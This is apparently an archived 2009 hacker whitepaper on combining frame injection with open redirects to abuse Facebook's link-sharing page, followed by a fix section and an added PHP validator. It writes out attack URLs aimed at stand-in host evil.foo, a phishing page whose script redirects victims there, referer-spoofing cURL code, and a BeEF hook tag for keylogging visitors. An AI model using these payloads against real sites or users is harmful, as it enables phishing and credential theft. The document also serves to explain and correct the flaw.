Frame Injection
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Disclaimer:
-----------
In this paper we will see how a "legal" frame injection can be combined with a
redirect vulnerability. This paper has been written for informational purposes;
don't use it illegally. I would in no case be responsible for your acts following
the reading of this article.
0) Summary:
-----------
1) Introduction
2) Frame injection definition, explanation
3) Description of the targeted url used as payload
4) Redirects a little description about the exploit
5) Way of exploitation, combining redirect with frame injection vulnz
6) Correct the vuln please !
7) Linkz and Greetz
Needed:
-A web server with cURL enabled
-Knowledge of PHP / JS
-A Facebook account and friends to test the exploit
-BeEF (bindshell.net)
-Frame injections and eyes to read it.
1) Introduction
---------------
Day after day, web vulnerabilities evolve constantly because of the diversity of
web programming languages. The first targets hit are mostly the social networks and
the search engines because of their huge daily traffic. That is why these websites
are compelled to apply the principle of responsible disclosure in order to protect
their users and prevent abuse.
2) Frame injection definition, explanation
------------------------------------------
Definition:
A frame injection attack (on the web) works on all GUI-based browsers; it consists
in loading arbitrary code such as JavaScript, VBScript (ActiveX), Flash or AJAX
(HTML+JS+py). This happens when code gets injected through frames because the
scripts do not validate their input.
Here is why:
* There is no need to inject special control characters such as angle brackets
(unlike HTMLi/XSS)
* HTMLi/XSS filtering routines will not protect against frame injection, since
the attacker only needs to insert a URL in the non-sanitized parameter
The best way to explain what I mean is to show an example. Most frame injection
issues occur in web applications because dynamic frameset/iframe insertion is not
implemented with enough filtering. For instance, say that we have the following URL
on the target site:
https://www.victim.foo/index.php?targeturl=/contact.php
A malicious user intending to launch a phishing attack will try tampering with
the targeturl parameter. His goal is to insert a third-party page that is under his
control, rather than the original contact page. Indeed, index.php, although it does
not allow HTML or JavaScript to be assigned to targeturl, is happy to process an
absolute URL rather than a relative one:
https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php
Note: the attacker can encode the malicious phishing link as hex values; we didn't
use that in this paper.
This technique only works if the victim contact has added you to his friend list
and if the Facebook session cookie is stored by your browser. The "legal" frame
injection on Facebook consists in submitting a URL to the page named sharer.php. On
Facebook you can see whether a contact is online or not once you accept him as a
friend, or if his profile is public. A malicious attacker will try to add you to
gain information about you. On Facebook I advise you not to allow every untrusted
contact to add you, because he can try to hack your account, for example by sending
you a malicious link.
Alternatively, the most common attack vector is manifested by the presence of a
double URL in the attack:
http://site.com/redirect?r=http://malicious_website.com
The Facebook sharer.php input source might look like this script:
#########################################################################
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Welcome in my-site-is-not-secure-now.w00t</title>
</head>
<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">
<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling="NO"
bordercolor="#0000CC" id="navigation">
<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0">
<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"
bordercolor="#000000" id="en-tete">
<frame src="<?php
// "secure" code: only URLs present in the allow-list are framed
if (isset($_GET['iframe'])) {
    // sharer.php allowed links here; note that the allowed Google Images URL
    // itself redirects (imgrefurl) to a third-party page
    $allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");
    if (in_array($_GET['iframe'], $allowUrls))
        echo $_GET['iframe']; // the iframe parameter is an allowed URL
    else // show the main page (or an error page)
        echo "accueil.htm";
} else { // no iframe parameter: show the main page
    echo "accueil.htm";
}
?>" name="corps" scrolling="auto" id="corps">
</frameset>
</frameset>
<noframes>No frames :(</noframes>
</html>
#########################################################################
Facebook changes the malicious URL to a clean link like this (501337, Crew and p3lo
stand for the values, letters and numbers, generated by the sharer.php script):
http://www.facebook.com/ext/share.php?sid=501337&h=Crew&u=p3lo
And the link on the Facebook profile appeared like this:
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Results of image search
http://www.google.fr/imgres?imgurl=http://fake_url...
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
<html>
<head>
<script type="text/javascript">
// frame-buster: if this page is loaded inside a frameset, replace the top window with it
if (top.frames.length != 0) top.location = self.document.location;
</script>
</head>
<body bgcolor="#99FF66">
The first script, contained in the head, breaks out of the first frame of my payload
URL by redirecting it to self.document.location.
The second script redirects my page to an advanced phishing page (keylogged with
BeEF, bindshell.net).
.p3lo
<br>
<br><br>
<script>document.location="http://evil.foo/login.php";</script>
</body>
</html>
###############################################################################
###############################################################################
<?php
//by p3lo
//this is how to send a GET request with cURL (your server has to be cURL enabled)
//spoofing referer
$referer = "http://www.facebook.com/";
// spoofing Firefox 2.0
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
$ch = curl_init();
// the URL to request is not given in the original paper
curl_setopt($ch, CURLOPT_URL, "http://URL-TO-REQUEST-PLACEHOLDER/");
curl_setopt($ch, CURLOPT_REFERER, $referer);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_exec($ch);
curl_close($ch);
?>
<script src="http://beefsite/beef/hook/beefmagic.js.php"></script> <!-- BeEF hook on my scam page -->
###############################################################################
6) Correct the vuln please !
----------------------------
After a long time of research, I think that the best way to correct these
vulnerabilities is to make sure the user knows that he is leaving the page and the
website's domain. An interstitial redirection page confirming his choice is the best
way to warn the user of the possible threats against him.
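As an added example (not code from the paper), here is a PHP check that applies the fix above to a parameter like targeturl or iframe: a same-site relative path is framed as-is, an absolute URL is framed only if its host is on an allow-list, and every other external target is routed through an interstitial page. The allow-list contents and the leaving.php page are assumptions.

```php
<?php
// Added example, not code from the paper. Decides what a frame/redirect target
// parameter may resolve to before it is written into <frame src> or Location.
function resolveFrameTarget(string $param, array $allowedHosts, string $default = 'accueil.htm'): string
{
    $param = trim($param);
    if ($param === '' || strlen($param) > 2048) {
        return $default;
    }
    $parts = parse_url($param);
    if ($parts === false) {
        return $default;
    }
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        // Relative target: exactly one leading "/", and no "//", no "\" (browsers
        // turn "/\host" into "//host") and no CR/LF (header injection).
        return preg_match('#^/(?![/\\\\])[^\\\\\r\n]*$#', $param) ? $param : $default;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($scheme !== 'http' && $scheme !== 'https') {
        return $default; // javascript:, data:, protocol-relative //host, ...
    }
    // Caveat: an allow-listed host must not itself be an open redirector (the
    // google.fr/imgres?imgrefurl= trick above). When in doubt leave the host out
    // of the list so that it goes through the interstitial page too.
    if (in_array(strtolower($parts['host'] ?? ''), $allowedHosts, true)) {
        return $param;
    }
    // Assumed interstitial "you are leaving this site" page (section 6).
    return '/leaving.php?to=' . rawurlencode($param);
}

// Escape the chosen target for a double-quoted attribute such as <frame src="...">,
// unlike the unescaped echo $_GET['iframe'] in the sharer.php listing above.
function frameSrcAttribute(string $target): string
{
    return 'src="' . htmlspecialchars($target, ENT_QUOTES, 'UTF-8') . '"';
}

$allowed = ['www.victim.foo']; // assumed allow-list
foreach (['/contact.php', 'http://evil.foo/login.php', '//evil.foo/login.php',
          '/\\evil.foo/login.php', 'javascript:alert(1)',
          'http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php'] as $t) {
    echo str_pad($t, 48), ' -> ', frameSrcAttribute(resolveFrameTarget($t, $allowed)), PHP_EOL;
}
```

Only the first test input is framed directly; the protocol-relative, backslash and javascript: forms fall back to the default page, and the two external URLs (including the allow-listed-by-exact-match imgres link from the paper) end up behind the interstitial.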
I hope you enjoyed reading my whitepaper.
# milw0rm.com [2009-02-12]